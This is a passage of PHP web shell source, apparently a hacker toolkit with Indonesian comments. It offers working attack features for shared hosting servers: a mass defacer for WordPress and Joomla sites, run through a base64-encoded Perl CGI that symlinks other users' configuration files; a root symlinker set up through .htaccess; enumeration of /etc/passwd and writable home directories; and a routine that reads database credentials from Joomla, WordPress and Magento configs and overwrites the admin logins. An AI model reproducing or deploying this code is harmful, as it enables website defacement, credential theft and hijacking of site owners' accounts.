$_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
814 NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
815 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
816 G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
817 YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
818 kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
819 B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
820 kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
821 VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
822 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
823 cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
824 MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
825 R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
826 }
827} elseif($_GET['do'] == 'symser'){
828$d0mains = @file("/etc/named.conf");
829if($d0mains){@mkdir("/3c",0777);@chdir("/3c");@exe("ln -s / root");$file3 = 'Options all
830DirectoryIndex Sux.html
831AddType text/plain .php
832AddHandler server-parsed .php
833AddType text/plain .html
834AddHandler txt .html
835Require None
836Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all
837 DirectoryIndex Sux.html
838 AddType text/plain .php
839 AddHandler server-parsed .php
840 AddType text/plain .html
841 AddHandler txt .html
842 Require None
843 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
844 DirectoryIndex Sux.html
845 AddType text/plain .php
846 AddHandler server-parsed .php
847 AddType text/plain .html
848 AddHandler txt .html
849 Require None
850 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}}
851 elseif($_GET['do'] == 'jumping') {
852 $i = 0;
853 echo "<div class='margin: 5px auto;'>";
854 if(preg_match("/hsphere/", $dir)) {
855 $urls = explode("\r\n", $_POST['url']);
856 if(isset($_POST['jump'])) {
857 echo "<pre>";
858 foreach($urls as $url) {
859 $url = str_replace(array("http://","www."), "", strtolower($url));
860 $etc = "/etc/passwd";
861 $f = fopen($etc,"r");
862 while($gets = fgets($f)) {
863 $pecah = explode(":", $gets);
864 $user = $pecah[0];
865 $dir_user = "/hsphere/local/home/$user";
866 if(is_dir($dir_user) === true) {
867 $url_user = $dir_user."/".$url;
868 if(is_readable($url_user)) {
869 $i++;
870 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$url_user'><font color=gold>$url_user</font></a>";
871 if(is_writable($url_user)) {
872 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$url_user'><font color=gold>$url_user</font></a>";
873 }
874 echo $jrw."<br>";
875 }
876 }
877 }
878 }
879 if($i == 0) {
880 } else {
881 echo "<br>Total ada ".$i." Kamar di ".$ip;
882 }
883 echo "</pre>";
884 } else {
885 echo '<center>
886 <form method="post">
887 List Domains: <br>
888 <textarea name="url" style="width: 500px; height: 250px;">';
889 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
890 while($getss = fgets($fp)) {
891 echo $getss;
892 }
893 echo '</textarea><br>
894 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
895 </form></center>';
896 }
897 } elseif(preg_match("/vhosts/", $dir)) {
898 $urls = explode("\r\n", $_POST['url']);
899 if(isset($_POST['jump'])) {
900 echo "<pre>";
901 foreach($urls as $url) {
902 $web_vh = "/var/www/vhosts/$url/httpdocs";
903 if(is_dir($web_vh) === true) {
904 if(is_readable($web_vh)) {
905 $i++;
906 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
907 if(is_writable($web_vh)) {
908 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
909 }
910 echo $jrw."<br>";
911 }
912 }
913 }
914 if($i == 0) {
915 } else {
916 echo "<br>Total ada ".$i." Kamar di ".$ip;
917 }
918 echo "</pre>";
919 } else {
920 echo '<center>
921 <form method="post">
922 List Domains: <br>
923 <textarea name="url" style="width: 500px; height: 250px;">';
924 bing("ip:$ip");
925 echo '</textarea><br>
926 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
927 </form></center>';
928 }
929 } else {
930 echo "<pre>";
931 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
932 while($passwd = fgets($etc)) {
933 if($passwd == '' || !$etc) {
934 echo "<font color=red>Can't read /etc/passwd</font>";
935 } else {
936 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
937 foreach($user_jumping[1] as $user_ec_jump) {
938 $user_jumping_dir = "/home/$user_ec_jump/public_html";
939 if(is_readable($user_jumping_dir)) {
940 $i++;
941 $jrw = "[<font color=lime>R</font>] <a href='?cr0tz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
942 if(is_writable($user_jumping_dir)) {
943 $jrw = "[<font color=lime>RW</font>] <a href='?cr0tz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
944 }
945 echo $jrw;
946 if(function_exists('posix_getpwuid')) {
947 $domain_jump = file_get_contents("/etc/named.conf");
948 if($domain_jump == '') {
949 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
950 } else {
951 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
952 foreach($domains_jump[1] as $dj) {
953 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
954 $user_jumping_url = $user_jumping_url['name'];
955 if($user_jumping_url == $user_ec_jump) {
956 echo " => ( <u>$dj</u> )<br>";
957 break;
958 }
959 }
960 }
961 } else {
962 echo "<br>";
963 }
964 }
965 }
966 }
967 }
968 if($i == 0) {
969 } else {
970 echo "<br>Total ada ".$i." Kamar di ".$ip;
971 }
972 echo "</pre>";
973 }
974 echo "</div>";
975} elseif($_GET['do'] == 'etcpler'){
976 echo "<center><div class=mybox>Bypass etc/passw With:<br>
977<table style='width:50%' align='center'>
978 <tr>
979 <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
980 <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
981 <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
982 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
983 <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
984</tr></table><center>Bypass User With : <table style='width:50%' align='center'>
985<tr>
986 <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
987 <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
988 <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
989 <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
990 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
991</tr>
992</table></div></center><br>";
993 if ($_POST['awkuser']) {
994echo"<textarea class='inputzbut' cols='65' rows='15'>";
995echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
996echo "</textarea><br>";
997}
998if ($_POST['systuser']) {
999echo"<textarea class='inputzbut' cols='65' rows='15'>";
1000echo system("ls /var/mail");
1001echo "</textarea><br>";
1002}
1003if ($_POST['passthuser']) {
1004echo"<textarea class='inputzbut' cols='65' rows='15'>";
1005echo passthru("ls /var/mail");
1006echo "</textarea><br>";
1007}
1008if ($_POST['exuser']) {
1009echo"<textarea class='inputzbut' cols='65' rows='15'>";
1010echo exec("ls /var/mail");
1011echo "</textarea><br>";
1012}
1013if ($_POST['shexuser']) {
1014echo"<textarea class='inputzbut' cols='65' rows='15'>";
1015echo shell_exec("ls /var/mail");
1016echo "</textarea><br>";
1017}
1018if($_POST['syst'])
1019{
1020echo"<textarea class='inputz' cols='65' rows='15'>";
1021echo system("cat /etc/passwd");
1022echo"</textarea><br><br><b></b><br>";
1023}
1024if($_POST['passth'])
1025{
1026echo"<textarea class='inputz' cols='65' rows='15'>";
1027echo passthru("cat /etc/passwd");
1028echo"</textarea><br><br><b></b><br>";
1029}
1030if($_POST['ex'])
1031{
1032echo"<textarea class='inputz' cols='65' rows='15'>";
1033echo exec("cat /etc/passwd");
1034echo"</textarea><br><br><b></b><br>";
1035}
1036if($_POST['shex'])
1037{
1038echo"<textarea class='inputz' cols='65' rows='15'>";
1039echo shell_exec("cat /etc/passwd");
1040echo"</textarea><br><br><b></b><br>";
1041}
1042echo '<center>';
1043if($_POST['melex'])
1044{
1045echo"<textarea class='inputz' cols='65' rows='15'>";
1046for($uid=0;$uid<60000;$uid++){
1047$ara = posix_getpwuid($uid);
1048if (!empty($ara)) {
1049while (list ($key, $val) = each($ara)){
1050print "$val:";
1051}
1052print "\n";
1053}
1054}
1055echo"</textarea><br><br>";
1056}
1057} elseif($_GET['do'] == 'auto_edit_user') {
1058 if($_POST['hajar']) {
1059 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1060 echo "username atau password harus lebih dari 6 karakter";
1061 } else {
1062 $user_baru = $_POST['user_baru'];
1063 $pass_baru = md5($_POST['pass_baru']);
1064 $conf = $_POST['config_dir'];
1065 $scan_conf = scandir($conf);
1066 foreach($scan_conf as $file_conf) {
1067 if(!is_file("$conf/$file_conf")) continue;
1068 $config = file_get_contents("$conf/$file_conf");
1069 if(preg_match("/JConfig|joomla/",$config)) {
1070 $dbhost = ambilkata($config,"host = '","'");
1071 $dbuser = ambilkata($config,"user = '","'");
1072 $dbpass = ambilkata($config,"password = '","'");
1073 $dbname = ambilkata($config,"db = '","'");
1074 $dbprefix = ambilkata($config,"dbprefix = '","'");
1075 $prefix = $dbprefix."users";
1076 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1077 $db = mysql_select_db($dbname);
1078 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1079 $result = mysql_fetch_array($q);
1080 $id = $result['id'];
1081 $site = ambilkata($config,"sitename = '","'");
1082 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1083 echo "Config => ".$file_conf."<br>";
1084 echo "CMS => Joomla<br>";
1085 if($site == '') {
1086 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1087 } else {
1088 echo "Sitename => $site<br>";
1089 }
1090 if(!$update OR !$conn OR !$db) {
1091 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1092 } else {
1093 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1094 }
1095 mysql_close($conn);
1096 } elseif(preg_match("/WordPress/",$config)) {
1097 $dbhost = ambilkata($config,"DB_HOST', '","'");
1098 $dbuser = ambilkata($config,"DB_USER', '","'");
1099 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1100 $dbname = ambilkata($config,"DB_NAME', '","'");
1101 $dbprefix = ambilkata($config,"table_prefix = '","'");
1102 $prefix = $dbprefix."users";
1103 $option = $dbprefix."options";
1104 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1105 $db = mysql_select_db($dbname);
1106 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1107 $result = mysql_fetch_array($q);
1108 $id = $result[ID];
1109 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1110 $result2 = mysql_fetch_array($q2);
1111 $target = $result2[option_value];
1112 if($target == '') {
1113 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1114 } else {
1115 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1116 }
1117 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1118 echo "Config => ".$file_conf."<br>";
1119 echo "CMS => Wordpress<br>";
1120 echo $url_target;
1121 if(!$update OR !$conn OR !$db) {
1122 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1123 } else {
1124 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1125 }
1126 mysql_close($conn);
1127 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1128 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1129 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1130 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1131 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1132 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1133 $prefix = $dbprefix."admin_user";
1134 $option = $dbprefix."core_config_data";
1135 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1136 $db = mysql_select_db($dbname);
1137 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1138 $result = mysql_fetch_array($q);
1139 $id = $result[user_id];
1140 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1141 $result2 = mysql_fetch_array($q2);
1142 $target = $result2[value];
1143 if($target == '') {
1144 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1145 } else {
1146 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1147 }
1148 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1149 echo "Config => ".$file_conf."<br>";
1150 echo "CMS => Magento<br>";
1151 echo $url_target;
1152 if(!$update OR !$conn OR !$db) {
1153 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1154 } else {
1155 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1156 }
1157 mysql_close($conn);
1158 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1159 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1160 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
